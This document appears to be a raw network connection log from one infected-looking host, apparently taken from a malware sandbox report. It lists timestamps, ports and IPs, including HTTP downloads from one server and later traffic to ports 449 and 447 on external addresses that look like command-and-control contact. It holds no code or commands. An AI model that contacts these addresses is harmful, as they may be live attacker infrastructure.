Mai 25, 2018 16:04:20.071095943 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:20.071182966 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:20.071283102 MESZ	49190	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:04:20.071307898 MESZ	80	49190	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:20.646050930 MESZ	80	49191	87.247.241.143	192.168.1.16
Mai 25, 2018 16:04:20.646151066 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:02.503922939 MESZ	64970	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:05:02.820489883 MESZ	53	64970	8.8.8.8	192.168.1.16
Mai 25, 2018 16:05:02.920933962 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:02.921024084 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:02.921148062 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.047264099 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.047291994 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.129065990 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.129085064 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.129091024 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.129204035 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.129548073 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.131957054 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.131983042 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.132128954 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.132148981 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.141367912 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.141393900 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.141472101 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.141499043 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152396917 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152415991 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152534962 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152549982 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152559996 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.152569056 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152595997 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152678013 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152690887 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152699947 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152719975 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.152755022 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.152904987 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.155313969 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155330896 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155339956 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155426979 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155441046 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155463934 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.155493021 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.155615091 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.172991991 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173010111 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173019886 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173031092 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173039913 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173135042 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173149109 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173158884 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173171997 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173173904 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.173212051 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173650026 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.173825026 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.173865080 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.175642967 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.175662041 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.175736904 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.175756931 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.185934067 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.185950994 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.185976982 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.185986996 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186045885 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.186068058 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186086893 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186098099 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186109066 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186167002 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.186182976 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186208963 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186232090 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186243057 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186252117 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186260939 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.186300993 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.186317921 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.187062025 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.188776970 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.188802958 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.188812017 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.189002037 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.189033985 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.198210955 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.198254108 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.198450089 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.399040937 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496653080 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.496680975 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496692896 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496701002 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496707916 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496715069 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496721983 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496727943 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496733904 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496741056 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496747017 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496752977 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496758938 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496764898 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496823072 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496854067 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.496884108 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496892929 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496897936 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496901989 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496906996 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496911049 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496925116 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496939898 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.496944904 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496953011 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496972084 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.496979952 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497001886 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497015953 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497025967 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497035980 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497039080 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.497045994 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497057915 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497066975 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497076035 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497083902 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497092962 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497101068 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497109890 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497117043 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.497118950 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497129917 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497142076 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497148037 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497160912 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497169018 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497175932 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497183084 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497189045 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497196913 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.497226000 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.498469114 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.508960962 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.508985996 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.508999109 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509006977 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509016991 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509032965 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509047031 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509054899 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509062052 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509068966 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509076118 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509082079 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509093046 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509099960 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509105921 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509111881 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509119034 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509125948 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509231091 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.509251118 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509260893 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509268045 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509274960 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509280920 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509288073 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509294987 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509305954 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509313107 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509320021 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509325981 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509334087 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509342909 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509349108 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509356022 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509423971 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509452105 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509541988 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.509565115 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509574890 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509582996 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509588003 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509593010 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509598017 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509603977 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509608984 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509613991 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.509618998 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.511063099 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518289089 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518311024 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518323898 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518333912 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518349886 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518357992 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518364906 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518372059 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518378973 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518385887 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518392086 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518399000 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518405914 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518413067 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518419027 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518425941 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518433094 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518439054 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518542051 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518563032 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518572092 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518579960 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518587112 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518594027 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518599987 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518605947 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518663883 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518666029 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518687010 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518702030 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518718958 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518734932 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518749952 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518762112 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518762112 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518775940 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518800974 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518821001 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518832922 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518846989 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518860102 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518861055 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518874884 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518893957 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518908024 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518922091 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518935919 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518944025 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.518946886 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518959045 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.518979073 MESZ	80	49192	87.247.241.143	192.168.1.16
Mai 25, 2018 16:05:03.519066095 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.529387951 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:03.529494047 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:05.077542067 MESZ	49192	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:53.830110073 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:54.188940048 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:54.875941038 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:56.079118967 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:05:58.486107111 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:03.297851086 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:12.970216990 MESZ	49191	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:13.921541929 MESZ	54618	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:06:14.069631100 MESZ	53	54618	8.8.8.8	192.168.1.16
Mai 25, 2018 16:06:14.071876049 MESZ	62396	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:06:14.214643955 MESZ	53	62396	8.8.8.8	192.168.1.16
Mai 25, 2018 16:06:14.215440035 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.215482950 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.215538025 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.215694904 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.215713024 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.349939108 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.350713968 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.350742102 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.422110081 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.422702074 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.422729015 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.493726969 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.495145082 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.495172024 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.584757090 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.586169004 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.586195946 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.662197113 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.663610935 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:14.663638115 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.741904974 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.943006039 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:14.943113089 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:19.745804071 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:06:19.746061087 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:19.746227026 MESZ	49193	80	192.168.1.16	87.247.241.143
Mai 25, 2018 16:06:19.746253967 MESZ	80	49193	87.247.241.143	192.168.1.16
Mai 25, 2018 16:09:08.120750904 MESZ	63638	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:08.860121012 MESZ	53	63638	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:08.884736061 MESZ	52877	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:09.165577888 MESZ	53	52877	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:09.168193102 MESZ	49194	80	192.168.1.16	216.239.34.21
Mai 25, 2018 16:09:09.168261051 MESZ	80	49194	216.239.34.21	192.168.1.16
Mai 25, 2018 16:09:09.168404102 MESZ	49194	80	192.168.1.16	216.239.34.21
Mai 25, 2018 16:09:09.169472933 MESZ	49194	80	192.168.1.16	216.239.34.21
Mai 25, 2018 16:09:09.169509888 MESZ	80	49194	216.239.34.21	192.168.1.16
Mai 25, 2018 16:09:10.098851919 MESZ	80	49194	216.239.34.21	192.168.1.16
Mai 25, 2018 16:09:10.299015999 MESZ	80	49194	216.239.34.21	192.168.1.16
Mai 25, 2018 16:09:10.299170971 MESZ	49194	80	192.168.1.16	216.239.34.21
Mai 25, 2018 16:09:10.303174019 MESZ	49194	80	192.168.1.16	216.239.34.21
Mai 25, 2018 16:09:11.970244884 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:11.970336914 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:11.970439911 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:12.096308947 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:12.096374989 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:13.249583006 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:13.292937040 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:13.292999983 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:13.954665899 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:14.157207966 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:15.074230909 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:15.074286938 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:15.084429026 MESZ	59362	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:15.469989061 MESZ	53	59362	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:15.485255003 MESZ	52261	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:15.637794018 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:15.771600008 MESZ	53	52261	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:15.883027077 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:15.883215904 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:16.781426907 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:16.781472921 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:17.460038900 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:17.673018932 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:18.711720943 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:18.711772919 MESZ	447	49197	82.202.221.37	192.168.1.16
